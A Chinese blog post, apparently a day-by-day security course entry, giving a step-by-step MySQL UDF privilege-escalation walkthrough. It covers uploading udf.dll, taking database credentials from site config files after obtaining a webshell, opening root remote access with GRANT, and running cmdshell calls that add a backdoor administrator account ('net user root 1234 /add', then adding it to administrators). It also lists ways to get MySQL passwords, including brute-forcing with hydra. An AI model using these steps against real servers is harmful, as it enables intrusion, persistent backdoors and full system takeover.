美文网首页
网络安全-Day49-MYsql UDF提权

网络安全-Day49-MYsql UDF提权

作者: K8s_Docker | 来源:发表于2020-05-07 22:06 被阅读0次

mysql udf提权操作

提示:上传udf.dll

小于mysql5.1版本

C:\\WINDOWS\\udf.dll 或 C:\\WINDOWS\\system32\\udf.dll

等于mysql5.1版本

%mysql%\\plugin\\udf.dll 用 select @@plugin_dir 查询plugin路径

默认 C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin\\udf.dll

1、拿到shell后,下载网站配置文件,从中获取数据库信息(conn、config、data、sql、common、inc)

2、使用菜刀本地连接数据库

3、获取root账号密码

一、基于安全考虑root账户一般只能本地访问,但是在开发过程中可能需要打开root的远程访问权限。下面是基本的步骤:1、登录到mysql中,为root进行远程访问的授权,执行下面的命令: mysql>

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";

mysql> flush privileges;

4、通过shell查看路径(路径不有lib、plugin这两个文件夹的自己加上去)

5、执行成功新增一个udf.dll文件

6、查询用户(select cmdshell('net user');)

7、创建用户(select cmdshell('net user root 1234 /add');)

8、查询用户是否新增成功(select cmdshell('net user');)

9、查看root账户,当前权限(select cmdshell('net user root');)

10、把root账户加入管理组(select cmdshell('net localgroup administrators root /add');)

赋权后查询

11、查看当前账户权限(select cmdshell('whoami');)

获取mysql密码的方法

1、查看网站配置文件

如:conn、config、data、sql、common、inc等

2.查看数据库安装路径下的mysql文件

安装目录为/data/mysql/user.myd和user.myi

3.通过暴力破解得到(hscan、Bruter、hydra、脚本木马)

相关文章

  • 网络安全-Day49-MYsql UDF提权

    mysqludf提权操作 提示:上传udf.dll 小于mysql5.1版本 C:\\WINDOWS\\udf.d...

  • 17.提权

    提权方法:溢出漏洞提权、数据库提权(mysql提权(udf提权,mof提权,自启动提权)、mssql提权)、第三方...

  • UDF提权

    1.什么是udf UDF是mysql的一个拓展接口,UDF(User defined function)可翻译为用...

  • udf提权

    天闲的无聊DEDECMS搞了几个站。没事做提权吧。真的很久很久没有玩这东西了。测试经典的UDF.dll提权一次性成...

  • mysql的提权的四种方案

    mysql的提权原理就是让mysql能够执行系统命令,而对与mysql的提权主要分为两种:MOF提权和UDF提权第...

  • Linux提权

    简单概述Linux的几种提权的办法。 内核溢出提权 mysql udf提权 上传库文件 执行库文件创建命令执行函数...

  • 【提权】MySQL提权之UDF

    0x01 UDF UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。...

  • mysql提权之udf提权

    提权的前提 mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下...

  • SQL提权

    UDF手工提权辅助: select @@basedir; #查看mysql安装目录select 'It is dl...

  • mysql udf.dll 提权

    今天学习了,mysql弱口令的提权方式,特记录一下。 1.所使用的工具 1.mysql连接工具:navicat...

网友评论

      本文标题:网络安全-Day49-MYsql UDF提权

      本文链接:https://www.haomeiwen.com/subject/otzaghtx.html